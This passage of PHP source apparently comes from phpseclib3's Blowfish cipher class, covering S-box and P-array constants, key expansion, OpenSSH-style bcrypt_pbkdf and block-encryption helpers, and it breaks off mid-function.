0xe6ba0d99, 0xde720c8c, 0x2da2f728, 0xd0127845, 0x95b794fd, 0x647d0862, 0xe7ccf5f0, 0x5449a36f, 0x877d48fa, 0xc39dfd27, 0xf33e8d1e, 0x0a476341, 0x992eff74, 0x3a6f6eab, 0xf4f8fd37, 0xa812dc60, 0xa1ebddf8, 0x991be14c, 0xdb6e6b0d, 0xc67b5510, 0x6d672c37, 0x2765d43b, 0xdcd0e804, 0xf1290dc7, 0xcc00ffa3, 0xb5390f92, 0x690fed0b, 0x667b9ffb, 0xcedb7d9c, 0xa091cf0b, 0xd9155ea3, 0xbb132f88, 0x515bad24, 0x7b9479bf, 0x763bd6eb, 0x37392eb3, 0xcc115979, 0x8026e297, 0xf42e312d, 0x6842ada7, 0xc66a2b3b, 0x12754ccc, 0x782ef11c, 0x6a124237, 0xb79251e7, 0x06a1bbe6, 0x4bfb6350, 0x1a6b1018, 0x11caedfa, 0x3d25bdd8, 0xe2e1c3c9, 0x44421659, 0x0a121386, 0xd90cec6e, 0xd5abea2a, 0x64af674e, 0xda86a85f, 0xbebfe988, 0x64e4c3fe, 0x9dbc8057, 0xf0f7c086, 0x60787bf8, 0x6003604d, 0xd1fd8346, 0xf6381fb0, 0x7745ae04, 0xd736fccc, 0x83426b33, 0xf01eab71, 0xb0804187, 0x3c005e5f, 0x77a057be, 0xbde8ae24, 0x55464299, 0xbf582e61, 0x4e58f48f, 0xf2ddfda2, 0xf474ef38, 0x8789bdc2, 0x5366f9c3, 0xc8b38e74, 0xb475f255, 0x46fcd9b9, 0x7aeb2661, 0x8b1ddf84, 0x846a0e79, 0x915f95e2, 0x466e598e, 0x20b45770, 0x8cd55591, 0xc902de4c, 0xb90bace1, 0xbb8205d0, 0x11a86248, 0x7574a99e, 0xb77f19b6, 0xe0a9dc09, 0x662d09a1, 0xc4324633, 0xe85a1f02, 0x09f0be8c, 0x4a99a025, 0x1d6efe10, 0x1ab93d1d, 0x0ba5a4df, 0xa186f20f, 0x2868f169, 0xdcb7da83, 0x573906fe, 0xa1e2ce9b, 0x4fcd7f52, 0x50115e01, 0xa70683fa, 0xa002b5c4, 0x0de6d027, 0x9af88c27, 0x773f8641, 0xc3604c06, 0x61a806b5, 0xf0177a28, 0xc0f586e0, 0x006058aa, 0x30dc7d62, 0x11e69ed7, 0x2338ea63, 0x53c2dd94, 0xc2c21634, 0xbbcbee56, 0x90bcb6de, 0xebfc7da1, 0xce591d76, 0x6f05e409, 0x4b7c0188, 0x39720a3d, 0x7c927c24, 0x86e3725f, 0x724d9db9, 0x1ac15bb4, 0xd39eb8fc, 0xed545578, 0x08fca5b5, 0xd83d7cd3, 0x4dad0fc4, 0x1e50ef5e, 0xb161e6f8, 0xa28514d9, 0x6c51133c, 0x6fd5c7e7, 0x56e14ec4, 0x362abfce, 0xddc6c837, 0xd79a3234, 0x92638212, 0x670efa8e, 0x406000e0 ]; /** * S-Box 3 * * @var array */ private static $sbox3 = [ 0x3a39ce37, 0xd3faf5cf, 0xabc27737, 0x5ac52d1b, 0x5cb0679e, 0x4fa33742, 0xd3822740, 0x99bc9bbe, 0xd5118e9d, 0xbf0f7315, 0xd62d1c7e, 0xc700c47b, 0xb78c1b6b, 0x21a19045, 0xb26eb1be, 0x6a366eb4, 0x5748ab2f, 0xbc946e79, 0xc6a376d2, 0x6549c2c8, 0x530ff8ee, 0x468dde7d, 0xd5730a1d, 0x4cd04dc6, 0x2939bbdb, 0xa9ba4650, 0xac9526e8, 0xbe5ee304, 0xa1fad5f0, 0x6a2d519a, 0x63ef8ce2, 0x9a86ee22, 0xc089c2b8, 0x43242ef6, 0xa51e03aa, 0x9cf2d0a4, 0x83c061ba, 0x9be96a4d, 0x8fe51550, 0xba645bd6, 0x2826a2f9, 0xa73a3ae1, 0x4ba99586, 0xef5562e9, 0xc72fefd3, 0xf752f7da, 0x3f046f69, 0x77fa0a59, 0x80e4a915, 0x87b08601, 0x9b09e6ad, 0x3b3ee593, 0xe990fd5a, 0x9e34d797, 0x2cf0b7d9, 0x022b8b51, 0x96d5ac3a, 0x017da67d, 0xd1cf3ed6, 0x7c7d2d28, 0x1f9f25cf, 0xadf2b89b, 0x5ad6b472, 0x5a88f54c, 0xe029ac71, 0xe019a5e6, 0x47b0acfd, 0xed93fa9b, 0xe8d3c48d, 0x283b57cc, 0xf8d56629, 0x79132e28, 0x785f0191, 0xed756055, 0xf7960e44, 0xe3d35e8c, 0x15056dd4, 0x88f46dba, 0x03a16125, 0x0564f0bd, 0xc3eb9e15, 0x3c9057a2, 0x97271aec, 0xa93a072a, 0x1b3f6d9b, 0x1e6321f5, 0xf59c66fb, 0x26dcf319, 0x7533d928, 0xb155fdf5, 0x03563482, 0x8aba3cbb, 0x28517711, 0xc20ad9f8, 0xabcc5167, 0xccad925f, 0x4de81751, 0x3830dc8e, 0x379d5862, 0x9320f991, 0xea7a90c2, 0xfb3e7bce, 0x5121ce64, 0x774fbe32, 0xa8b6e37e, 0xc3293d46, 0x48de5369, 0x6413e680, 0xa2ae0810, 0xdd6db224, 0x69852dfd, 0x09072166, 0xb39a460a, 0x6445c0dd, 0x586cdecf, 0x1c20c8ae, 0x5bbef7dd, 0x1b588d40, 0xccd2017f, 0x6bb4e3bb, 0xdda26a7e, 0x3a59ff45, 0x3e350a44, 0xbcb4cdd5, 0x72eacea8, 0xfa6484bb, 0x8d6612ae, 0xbf3c6f47, 0xd29be463, 0x542f5d9e, 0xaec2771b, 0xf64e6370, 0x740e0d8d, 0xe75b1357, 0xf8721671, 0xaf537d5d, 0x4040cb08, 0x4eb4e2cc, 0x34d2466a, 0x0115af84, 0xe1b00428, 0x95983a1d, 0x06b89fb4, 0xce6ea048, 0x6f3f3b82, 0x3520ab82, 0x011a1d4b, 0x277227f8, 0x611560b1, 0xe7933fdc, 0xbb3a792b, 0x344525bd, 0xa08839e1, 0x51ce794b, 0x2f32c9b7, 0xa01fbac9, 0xe01cc87e, 0xbcc7d1f6, 0xcf0111c3, 0xa1e8aac7, 0x1a908749, 0xd44fbd9a, 0xd0dadecb, 0xd50ada38, 0x0339c32a, 0xc6913667, 0x8df9317c, 0xe0b12b4f, 0xf79e59b7, 0x43f5bb3a, 0xf2d519ff, 0x27d9459c, 0xbf97222c, 0x15e6fc2a, 0x0f91fc71, 0x9b941525, 0xfae59361, 0xceb69ceb, 0xc2a86459, 0x12baa8d1, 0xb6c1075e, 0xe3056a0c, 0x10d25065, 0xcb03a442, 0xe0ec6e0e, 0x1698db3b, 0x4c98a0be, 0x3278e964, 0x9f1f9532, 0xe0d392df, 0xd3a0342b, 0x8971f21e, 0x1b0a7441, 0x4ba3348c, 0xc5be7120, 0xc37632d8, 0xdf359f8d, 0x9b992f2e, 0xe60b6f47, 0x0fe3f11d, 0xe54cda54, 0x1edad891, 0xce6279cf, 0xcd3e7e6f, 0x1618b166, 0xfd2c1d05, 0x848fd2c5, 0xf6fb2299, 0xf523f357, 0xa6327623, 0x93a83531, 0x56cccd02, 0xacf08162, 0x5a75ebb5, 0x6e163697, 0x88d273cc, 0xde966292, 0x81b949d0, 0x4c50901b, 0x71c65614, 0xe6c6c7bd, 0x327a140a, 0x45e1d006, 0xc3f27b9a, 0xc9aa53fd, 0x62a80f00, 0xbb25bfe2, 0x35bdd2f6, 0x71126905, 0xb2040222, 0xb6cbcf7c, 0xcd769c2b, 0x53113ec0, 0x1640e3d3, 0x38abbd60, 0x2547adf0, 0xba38209c, 0xf746ce76, 0x77afa1c5, 0x20756060, 0x85cbfe4e, 0x8ae88dd8, 0x7aaaf9b0, 0x4cf9aa7e, 0x1948c25c, 0x02fb8a8c, 0x01c36ae4, 0xd6ebe1f9, 0x90d4f869, 0xa65cdea0, 0x3f09252d, 0xc208e69f, 0xb74e6132, 0xce77e25b, 0x578fdfe3, 0x3ac372e6 ]; /** * P-Array consists of 18 32-bit subkeys * * @var array */ private static $parray = [ 0x243f6a88, 0x85a308d3, 0x13198a2e, 0x03707344, 0xa4093822, 0x299f31d0, 0x082efa98, 0xec4e6c89, 0x452821e6, 0x38d01377, 0xbe5466cf, 0x34e90c6c, 0xc0ac29b7, 0xc97c50dd, 0x3f84d5b5, 0xb5470917, 0x9216d5d9, 0x8979fb1b ]; /** * The BCTX-working Array * * Holds the expanded key [p] and the key-depended s-boxes [sb] * * @var array */ private $bctx; /** * Holds the last used key * * @var array */ private $kl; /** * The Key Length (in bytes) * {@internal The max value is 256 / 8 = 32, the min value is 128 / 8 = 16. Exists in conjunction with $Nk * because the encryption / decryption / key schedule creation requires this number and not $key_length. We could * derive this from $key_length or vice versa, but that'd mean we'd have to do multiple shift operations, so in lieu * of that, we'll just precompute it once.} * * @see \phpseclib3\Crypt\Common\SymmetricKey::setKeyLength() * @var int */ protected $key_length = 16; /** * Default Constructor. * * @param string $mode * @throws \InvalidArgumentException if an invalid / unsupported mode is provided */ public function __construct($mode) { parent::__construct($mode); if ($this->mode == self::MODE_STREAM) { throw new \InvalidArgumentException('Block ciphers cannot be ran in stream mode'); } } /** * Sets the key length. * * Key lengths can be between 32 and 448 bits. * * @param int $length */ public function setKeyLength($length) { if ($length < 32 || $length > 448) { throw new \LengthException('Key size of ' . $length . ' bits is not supported by this algorithm. Only keys of sizes between 32 and 448 bits are supported'); } $this->key_length = $length >> 3; parent::setKeyLength($length); } /** * Test for engine validity * * This is mainly just a wrapper to set things up for \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * * @see \phpseclib3\Crypt\Common\SymmetricKey::isValidEngine() * @param int $engine * @return bool */ protected function isValidEngineHelper($engine) { if ($engine == self::ENGINE_OPENSSL) { if ($this->key_length < 16) { return false; } // quoting https://www.openssl.org/news/openssl-3.0-notes.html, OpenSSL 3.0.1 // "Moved all variations of the EVP ciphers CAST5, BF, IDEA, SEED, RC2, RC4, RC5, and DES to the legacy provider" // in theory openssl_get_cipher_methods() should catch this but, on GitHub Actions, at least, it does not if (defined('OPENSSL_VERSION_TEXT') && version_compare(preg_replace('#OpenSSL (\d+\.\d+\.\d+) .*#', '$1', OPENSSL_VERSION_TEXT), '3.0.1', '>=')) { return false; } $this->cipher_name_openssl_ecb = 'bf-ecb'; $this->cipher_name_openssl = 'bf-' . $this->openssl_translate_mode(); } return parent::isValidEngineHelper($engine); } /** * Setup the key (expansion) * * @see \phpseclib3\Crypt\Common\SymmetricKey::_setupKey() */ protected function setupKey() { if (isset($this->kl['key']) && $this->key === $this->kl['key']) { // already expanded return; } $this->kl = ['key' => $this->key]; /* key-expanding p[] and S-Box building sb[] */ $this->bctx = [ 'p' => [], 'sb' => [ self::$sbox0, self::$sbox1, self::$sbox2, self::$sbox3 ] ]; // unpack binary string in unsigned chars $key = array_values(unpack('C*', $this->key)); $keyl = count($key); // with bcrypt $keyl will always be 16 (because the key is the sha512 of the key you provide) for ($j = 0, $i = 0; $i < 18; ++$i) { // xor P1 with the first 32-bits of the key, xor P2 with the second 32-bits ... for ($data = 0, $k = 0; $k < 4; ++$k) { $data = ($data << 8) | $key[$j]; if (++$j >= $keyl) { $j = 0; } } $this->bctx['p'][] = self::$parray[$i] ^ intval($data); } // encrypt the zero-string, replace P1 and P2 with the encrypted data, // encrypt P3 and P4 with the new P1 and P2, do it with all P-array and subkeys $data = "\0\0\0\0\0\0\0\0"; for ($i = 0; $i < 18; $i += 2) { list($l, $r) = array_values(unpack('N*', $data = $this->encryptBlock($data))); $this->bctx['p'][$i ] = $l; $this->bctx['p'][$i + 1] = $r; } for ($i = 0; $i < 4; ++$i) { for ($j = 0; $j < 256; $j += 2) { list($l, $r) = array_values(unpack('N*', $data = $this->encryptBlock($data))); $this->bctx['sb'][$i][$j ] = $l; $this->bctx['sb'][$i][$j + 1] = $r; } } } /** * Initialize Static Variables */ protected static function initialize_static_variables() { if (is_float(self::$sbox2[0])) { self::$sbox0 = array_map('intval', self::$sbox0); self::$sbox1 = array_map('intval', self::$sbox1); self::$sbox2 = array_map('intval', self::$sbox2); self::$sbox3 = array_map('intval', self::$sbox3); self::$parray = array_map('intval', self::$parray); } parent::initialize_static_variables(); } /** * bcrypt * * @param string $sha2pass * @param string $sha2salt * @access private * @return string */ private static function bcrypt_hash($sha2pass, $sha2salt) { $p = self::$parray; $sbox0 = self::$sbox0; $sbox1 = self::$sbox1; $sbox2 = self::$sbox2; $sbox3 = self::$sbox3; $cdata = array_values(unpack('N*', 'OxychromaticBlowfishSwatDynamite')); $sha2pass = array_values(unpack('N*', $sha2pass)); $sha2salt = array_values(unpack('N*', $sha2salt)); self::expandstate($sha2salt, $sha2pass, $sbox0, $sbox1, $sbox2, $sbox3, $p); for ($i = 0; $i < 64; $i++) { self::expand0state($sha2salt, $sbox0, $sbox1, $sbox2, $sbox3, $p); self::expand0state($sha2pass, $sbox0, $sbox1, $sbox2, $sbox3, $p); } for ($i = 0; $i < 64; $i++) { for ($j = 0; $j < 8; $j += 2) { // count($cdata) == 8 list($cdata[$j], $cdata[$j + 1]) = self::encryptBlockHelperFast($cdata[$j], $cdata[$j + 1], $sbox0, $sbox1, $sbox2, $sbox3, $p); } } return pack('L*', ...$cdata); } /** * Performs OpenSSH-style bcrypt * * @param string $pass * @param string $salt * @param int $keylen * @param int $rounds * @access public * @return string */ public static function bcrypt_pbkdf($pass, $salt, $keylen, $rounds) { self::initialize_static_variables(); if (PHP_INT_SIZE == 4) { throw new \RuntimeException('bcrypt is far too slow to be practical on 32-bit versions of PHP'); } $sha2pass = hash('sha512', $pass, true); $results = []; $count = 1; while (32 * count($results) < $keylen) { $countsalt = $salt . pack('N', $count++); $sha2salt = hash('sha512', $countsalt, true); $out = $tmpout = self::bcrypt_hash($sha2pass, $sha2salt); for ($i = 1; $i < $rounds; $i++) { $sha2salt = hash('sha512', $tmpout, true); $tmpout = self::bcrypt_hash($sha2pass, $sha2salt); $out ^= $tmpout; } $results[] = $out; } $output = ''; for ($i = 0; $i < 32; $i++) { foreach ($results as $result) { $output .= $result[$i]; } } return substr($output, 0, $keylen); } /** * Key expansion without salt * * @access private * @param int[] $key * @param int[] $sbox0 * @param int[] $sbox1 * @param int[] $sbox2 * @param int[] $sbox3 * @param int[] $p * @see self::_bcrypt_hash() */ private static function expand0state(array $key, array &$sbox0, array &$sbox1, array &$sbox2, array &$sbox3, array &$p) { // expand0state is basically the same thing as this: //return self::expandstate(array_fill(0, 16, 0), $key); // but this separate function eliminates a bunch of XORs and array lookups $p = [ $p[0] ^ $key[0], $p[1] ^ $key[1], $p[2] ^ $key[2], $p[3] ^ $key[3], $p[4] ^ $key[4], $p[5] ^ $key[5], $p[6] ^ $key[6], $p[7] ^ $key[7], $p[8] ^ $key[8], $p[9] ^ $key[9], $p[10] ^ $key[10], $p[11] ^ $key[11], $p[12] ^ $key[12], $p[13] ^ $key[13], $p[14] ^ $key[14], $p[15] ^ $key[15], $p[16] ^ $key[0], $p[17] ^ $key[1] ]; // @codingStandardsIgnoreStart list( $p[0], $p[1]) = self::encryptBlockHelperFast( 0, 0, $sbox0, $sbox1, $sbox2, $sbox3, $p); list( $p[2], $p[3]) = self::encryptBlockHelperFast($p[ 0], $p[ 1], $sbox0, $sbox1, $sbox2, $sbox3, $p); list( $p[4], $p[5]) = self::encryptBlockHelperFast($p[ 2], $p[ 3], $sbox0, $sbox1, $sbox2, $sbox3, $p); list( $p[6], $p[7]) = self::encryptBlockHelperFast($p[ 4], $p[ 5], $sbox0, $sbox1, $sbox2, $sbox3, $p); list( $p[8], $p[9]) = self::encryptBlockHelperFast($p[ 6], $p[ 7], $sbox0, $sbox1, $sbox2, $sbox3, $p); list($p[10], $p[11]) = self::encryptBlockHelperFast($p[ 8], $p[ 9], $sbox0, $sbox1, $sbox2, $sbox3, $p); list($p[12], $p[13]) = self::encryptBlockHelperFast($p[10], $p[11], $sbox0, $sbox1, $sbox2, $sbox3, $p); list($p[14], $p[15]) = self::encryptBlockHelperFast($p[12], $p[13], $sbox0, $sbox1, $sbox2, $sbox3, $p); list($p[16], $p[17]) = self::encryptBlockHelperFast($p[14], $p[15], $sbox0, $sbox1, $sbox2, $sbox3, $p); // @codingStandardsIgnoreEnd list($sbox0[0], $sbox0[1]) = self::encryptBlockHelperFast($p[16], $p[17], $sbox0, $sbox1, $sbox2, $sbox3, $p); for ($i = 2; $i < 256; $i += 2) { list($sbox0[$i], $sbox0[$i + 1]) = self::encryptBlockHelperFast($sbox0[$i - 2], $sbox0[$i - 1], $sbox0, $sbox1, $sbox2, $sbox3, $p); } list($sbox1[0], $sbox1[1]) = self::encryptBlockHelperFast($sbox0[254], $sbox0[255], $sbox0, $sbox1, $sbox2, $sbox3, $p); for ($i = 2; $i < 256; $i += 2) { list($sbox1[$i], $sbox1[$i + 1]) = self::encryptBlockHelperFast($sbox1[$i - 2], $sbox1[$i - 1], $sbox0, $sbox1, $sbox2, $sbox3, $p); } list($sbox2[0], $sbox2[1]) = self::encryptBlockHelperFast($sbox1[254], $sbox1[255], $sbox0, $sbox1, $sbox2, $sbox3, $p); for ($i = 2; $i < 256; $i += 2) { list($sbox2[$i], $sbox2[$i + 1]) = self::encryptBlockHelperFast($sbox2[$i - 2], $sbox2[$i - 1], $sbox0, $sbox1, $sbox2, $sbox3, $p); } list($sbox3[0], $sbox3[1]) = self::encryptBlockHelperFast($sbox2[254], $sbox2[255], $sbox0, $sbox1, $sbox2, $sbox3, $p); for ($i = 2; $i < 256; $i += 2) { list($sbox3[$i], $sbox3[$i + 1]) = self::encryptBlockHelperFast($sbox3[$i - 2], $sbox3[$i - 1], $sbox0, $sbox1, $sbox2, $sbox3, $p); } } /** * Key expansion with salt * * @access private * @param int[] $data * @param int[] $key * @param int[] $sbox0 * @param int[] $sbox1 * @param int[] $sbox2 * @param int[] $sbox3 * @param int[] $p * @see self::_bcrypt_hash() */ private static function expandstate(array $data, array $key, array &$sbox0, array &$sbox1, array &$sbox2, array &$sbox3, array &$p) { $p = [ $p[0] ^ $key[0], $p[1] ^ $key[1], $p[2] ^ $key[2], $p[3] ^ $key[3], $p[4] ^ $key[4], $p[5] ^ $key[5], $p[6] ^ $key[6], $p[7] ^ $key[7], $p[8] ^ $key[8], $p[9] ^ $key[9], $p[10] ^ $key[10], $p[11] ^ $key[11], $p[12] ^ $key[12], $p[13] ^ $key[13], $p[14] ^ $key[14], $p[15] ^ $key[15], $p[16] ^ $key[0], $p[17] ^ $key[1] ]; // @codingStandardsIgnoreStart list( $p[0], $p[1]) = self::encryptBlockHelperFast($data[ 0] , $data[ 1] , $sbox0, $sbox1, $sbox2, $sbox3, $p); list( $p[2], $p[3]) = self::encryptBlockHelperFast($data[ 2] ^ $p[ 0], $data[ 3] ^ $p[ 1], $sbox0, $sbox1, $sbox2, $sbox3, $p); list( $p[4], $p[5]) = self::encryptBlockHelperFast($data[ 4] ^ $p[ 2], $data[ 5] ^ $p[ 3], $sbox0, $sbox1, $sbox2, $sbox3, $p); list( $p[6], $p[7]) = self::encryptBlockHelperFast($data[ 6] ^ $p[ 4], $data[ 7] ^ $p[ 5], $sbox0, $sbox1, $sbox2, $sbox3, $p); list( $p[8], $p[9]) = self::encryptBlockHelperFast($data[ 8] ^ $p[ 6], $data[ 9] ^ $p[ 7], $sbox0, $sbox1, $sbox2, $sbox3, $p); list($p[10], $p[11]) = self::encryptBlockHelperFast($data[10] ^ $p[ 8], $data[11] ^ $p[ 9], $sbox0, $sbox1, $sbox2, $sbox3, $p); list($p[12], $p[13]) = self::encryptBlockHelperFast($data[12] ^ $p[10], $data[13] ^ $p[11], $sbox0, $sbox1, $sbox2, $sbox3, $p); list($p[14], $p[15]) = self::encryptBlockHelperFast($data[14] ^ $p[12], $data[15] ^ $p[13], $sbox0, $sbox1, $sbox2, $sbox3, $p); list($p[16], $p[17]) = self::encryptBlockHelperFast($data[ 0] ^ $p[14], $data[ 1] ^ $p[15], $sbox0, $sbox1, $sbox2, $sbox3, $p); // @codingStandardsIgnoreEnd list($sbox0[0], $sbox0[1]) = self::encryptBlockHelperFast($data[2] ^ $p[16], $data[3] ^ $p[17], $sbox0, $sbox1, $sbox2, $sbox3, $p); for ($i = 2, $j = 4; $i < 256; $i += 2, $j = ($j + 2) % 16) { // instead of 16 maybe count($data) would be better? list($sbox0[$i], $sbox0[$i + 1]) = self::encryptBlockHelperFast($data[$j] ^ $sbox0[$i - 2], $data[$j + 1] ^ $sbox0[$i - 1], $sbox0, $sbox1, $sbox2, $sbox3, $p); } list($sbox1[0], $sbox1[1]) = self::encryptBlockHelperFast($data[2] ^ $sbox0[254], $data[3] ^ $sbox0[255], $sbox0, $sbox1, $sbox2, $sbox3, $p); for ($i = 2, $j = 4; $i < 256; $i += 2, $j = ($j + 2) % 16) { list($sbox1[$i], $sbox1[$i + 1]) = self::encryptBlockHelperFast($data[$j] ^ $sbox1[$i - 2], $data[$j + 1] ^ $sbox1[$i - 1], $sbox0, $sbox1, $sbox2, $sbox3, $p); } list($sbox2[0], $sbox2[1]) = self::encryptBlockHelperFast($data[2] ^ $sbox1[254], $data[3] ^ $sbox1[255], $sbox0, $sbox1, $sbox2, $sbox3, $p); for ($i = 2, $j = 4; $i < 256; $i += 2, $j = ($j + 2) % 16) { list($sbox2[$i], $sbox2[$i + 1]) = self::encryptBlockHelperFast($data[$j] ^ $sbox2[$i - 2], $data[$j + 1] ^ $sbox2[$i - 1], $sbox0, $sbox1, $sbox2, $sbox3, $p); } list($sbox3[0], $sbox3[1]) = self::encryptBlockHelperFast($data[2] ^ $sbox2[254], $data[3] ^ $sbox2[255], $sbox0, $sbox1, $sbox2, $sbox3, $p); for ($i = 2, $j = 4; $i < 256; $i += 2, $j = ($j + 2) % 16) { list($sbox3[$i], $sbox3[$i + 1]) = self::encryptBlockHelperFast($data[$j] ^ $sbox3[$i - 2], $data[$j + 1] ^ $sbox3[$i - 1], $sbox0, $sbox1, $sbox2, $sbox3, $p); } } /** * Encrypts a block * * @param string $in * @return string */ protected function encryptBlock($in) { $p = $this->bctx['p']; // extract($this->bctx['sb'], EXTR_PREFIX_ALL, 'sb'); // slower $sb_0 = $this->bctx['sb'][0]; $sb_1 = $this->bctx['sb'][1]; $sb_2 = $this->bctx['sb'][2]; $sb_3 = $this->bctx['sb'][3]; $in = unpack('N*', $in); $l = $in[1]; $r = $in[2]; list($r, $l) = PHP_INT_SIZE == 4 ? self::encryptBlockHelperSlow($l, $r, $sb_0, $sb_1, $sb_2, $sb_3, $p) : self::encryptBlockHelperFast($l, $r, $sb_0, $sb_1, $sb_2, $sb_3, $p); return pack("N*", $r, $l); } /** * Fast helper function for block encryption * * @access private * @param int $x0 * @param int $x1 * @param int[] $sbox0 * @param int[] $sbox1 * @param int[] $sbox2 * @param int[] $sbox3 * @param int[] $p * @return int[] */ private static function encryptBlockHelperFast($x0, $x1, array $sbox0, array $sbox1, array $sbox2, array $sbox3, array $p) { $x0 ^= $p[0]; $x1 ^= ((($sbox0[($x0 & 0xFF000000) >> 24] + $sbox1[($x0 & 0xFF0000) >> 16]) ^ $sbox2[($x0 & 0xFF00) >> 8]) + $sbox3[$x0 & 0xFF]) ^ $p[1]; $x0 ^= ((($sbox0[($x1 & 0xFF000000) >> 24] + $sbox1[($x1 & 0xFF0000) >> 16]) ^ $sbox2[($x1 & 0xFF00) >> 8]) + $sbox3[$x1 & 0xFF]) ^ $p[2]; $x1 ^= ((($sbox0[($x0 & 0xFF000000) >> 24] + $sbox1[($x0 & 0xFF0000) >> 16]) ^ $sbox2[($x0 & 0xFF00) >> 8]) + $sbox3[$x0 & 0xFF]) ^ $p[3]; $x0 ^= ((($sbox0[($x1 & 0xFF000000) >> 24] + $sbox1[($x1 & 0xFF0000) >> 16]) ^ $sbox2[($x1 & 0xFF00) >> 8]) + $sbox3[$x1 & 0xFF]) ^ $p[4]; $x1 ^= ((($sbox0[($x0 & 0xFF000000) >> 24] + $sbox1[($x0 & 0xFF0000) >> 16]) ^ $sbox2[($x0 & 0xFF00) >> 8]) + $sbox3[$x0 & 0xFF]) ^ $p[5]; $x0 ^= ((($sbox0[($x1 & 0xFF000000) >> 24] + $sbox1[($x1 & 0xFF0000) >> 16]) ^ $sbox2[($x1 & 0xFF00) >> 8]) + $sbox3[$x1 & 0xFF]) ^ $p[6]; $x1 ^= ((($sbox0[($x0 & 0xFF000000) >> 24] + $sbox1[($x0 & 0xFF0000) >> 16]) ^ $sbox2[($x0 & 0xFF00) >> 8]) + $sbox3[$x0 & 0xFF]) ^ $p[7]; $x0 ^= ((($sbox0[($x1 & 0xFF000000) >> 24] + $sbox1[($x1 & 0xFF0000) >> 16]) ^ $sbox2[($x1 & 0xFF00) >> 8]) + $sbox3[$x1 & 0xFF]) ^ $p[8]; $x1 ^= ((($sbox0[($x0 & 0xFF000000) >> 24] + $sbox1[($x0 & 0xFF0000) >> 16]) ^ $sbox2[($x0 & 0xFF00) >> 8]) + $sbox3[$x0 & 0xFF]) ^ $p[9]; $x0 ^= ((($sbox0[($x1 & 0xFF000000) >> 24] + $sbox1[($x1 & 0xFF0000) >> 16]) ^ $sbox2[($x1 & 0xFF00) >> 8]) + $sbox3[$x1 & 0xFF]) ^ $p[10]; $x1 ^= ((($sbox0[($x0 & 0xFF000000) >> 24] + $sbox1[($x0 & 0xFF0000) >> 16]) ^ $sbox2[($x0 & 0xFF00) >> 8]) + $sbox3[$x0 & 0xFF]) ^ $p[11]; $x0 ^= ((($sbox0[($x1 & 0xFF000000) >> 24] + $sbox1[($x1 & 0xFF0000) >> 16]) ^ $sbox2[($x1 & 0xFF00) >> 8]) + $sbox3[$x1 & 0xFF]) ^ $p[12]; $x1 ^= ((($sbox0[($x0 & 0xFF000000) >> 24] + $sbox1[($x0 & 0xFF0000) >> 16]) ^ $sbox2[($x0 & 0xFF00) >> 8]) + $sbox3[$x0 & 0xFF]) ^ $p[13]; $x0 ^= ((($sbox0[($x1 & 0xFF000000) >> 24] + $sbox1[($x1 & 0xFF0000) >> 16]) ^ $sbox2[($x1 & 0xFF00) >> 8]) + $sbox3[$x1 & 0xFF]) ^ $p[14]; $x1 ^= ((($sbox0[($x0 & 0xFF000000) >> 24] + $sbox1[($x0 & 0xFF0000) >> 16]) ^ $sbox2[($x0 & 0xFF00) >> 8]) + $sbox3[$x0 & 0xFF]) ^ $p[15]; $x0 ^= ((($sbox0[($x1 & 0xFF000000) >> 24] + $sbox1[($x1 & 0xFF0000) >> 16]) ^ $sbox2[($x1 & 0xFF00) >> 8]) + $sbox3[$x1 & 0xFF]) ^ $p[16]; return [$x1 & 0xFFFFFFFF ^ $p[17], $x0 & 0xFFFFFFFF]; } /** * Slow helper function for block encryption * * @access private * @param int $x0 * @param int $x1 * @param int[] $sbox0 * @param int[] $sbox1 * @param int[] $sbox2 * @param int[] $sbox3 * @param int[] $p * @return int[] */ private static function encryptBlockHelperSlow($x0, $x1, array $sbox0, array $sbox1, array $sbox2, array $sbox3, array $p) { // -16777216 == intval(0xFF000000) on 32-bit PHP installs $x0 ^= $p[0]; $x1 ^= self::safe_intval((self::safe_intval($sbox0[(($x0 & -16777216) >> 24) & 0xFF] + $sbox1[($x0 & 0xFF0000) >> 16]) ^ $sbox2[($x0 & 0xFF00) >> 8]) + $sbox3[$x0 & 0xFF]) ^ $p[1]; $x0 ^= self::safe_intval((self::safe_intval($sbox0[(($x1 & -16777216) >> 24) & 0xFF] + $sbox1[($x1 & 0xFF0000) >> 16]) ^ $sbox2[($x1 & 0xFF00) >> 8]) + $sbox3[$x1 & 0xFF]) ^ $p[2]; $x1 ^= self::safe_intval((self::safe_intval($sbox0[(($x0 & -16777216) >> 24) & 0xFF] + $sbox1[($x0 & 0xFF0000) >> 16]) ^ $sbox2[($x0 & 0xFF00) >> 8]) + $sbox3[$x0 & 0xFF]) ^ $p[3]; $x0 ^= self::safe_intval((self::safe_intval($sbox0[(($x1 & -16777216) >> 24) & 0xFF] + $sbox1[($x1 & 0xFF0000) >> 16]) ^ $sbox2[($x1 & 0xFF00) >> 8]) + $sbox3[$x1 & 0xFF]) ^ $p[4]; $x1 ^= self::safe_intval((self::safe_intval($sbox0[(($x0 & -16777216) >> 24) & 0xFF] + $sbox1[($x0 & 0xFF0000) >> 16]) ^ $sbox2[($x0 & 0xFF00) >> 8]) + $sbox3[$x0 & 0xFF]) ^ $p[5]; $x0 ^= self::safe_intval((self::safe_intval($sbox0[(($x1 & -16777216) >> 24) & 0xFF] + $sbox1[($x1 & 0xFF0000) >> 16]) ^ $sbox2[($x1 & 0xFF00) >> 8]) + $sbox3[$x1 & 0xFF]) ^ $p[6]; $x1 ^= self::safe_intval((self::safe_intval($sbox0[(($x0 & -16777216) >> 24) & 0xFF] + $sbox1[($x0 & 0xFF0000) >> 16]) ^ $sbox2[($x0 & 0xFF00) >> 8]) + $sbox3[$x0 & 0xFF]) ^ $p[7]; $x0 ^= self::safe_intval((self::safe_intval($sbox0[(($x1 & -16777216) >> 24) & 0xFF] + $sbox1[($x1 & 0xFF0000) >> 16]) ^ $sbox2[($x1 & 0xFF00) >> 8]) + $sbox3[$x1 & 0xFF]) ^ $p[8]; $x1 ^= self::safe_intval((self::safe_intval($sbox0[(($x0 & -16777216) >> 24) & 0xFF] + $sbox1[($x0 & 0xFF0000) >> 16]) ^ $sbox2[($x0 & 0xFF00) >> 8]) + $sbox3[$x0 & 0xFF]) ^ $p[9]; $x0 ^= self::safe_intval((self::safe_intval($sbox0[(($x1 & -16777216) >> 24) & 0xFF] + $sbox1[($x1 & 0xFF0000) >> 16]) ^ $sbox2[($x1 & 0xFF00) >> 8]) + $sbox3[$x1 & 0xFF]) ^ $p[10]; $x1 ^= self::safe_intval((self::safe_intval($sbox0[(($x0 & -16777216) >> 24) & 0xFF] + $sbox1[($x0 & 0xFF0000) >> 16]) ^ $sbox2[($x0 & 0xFF00) 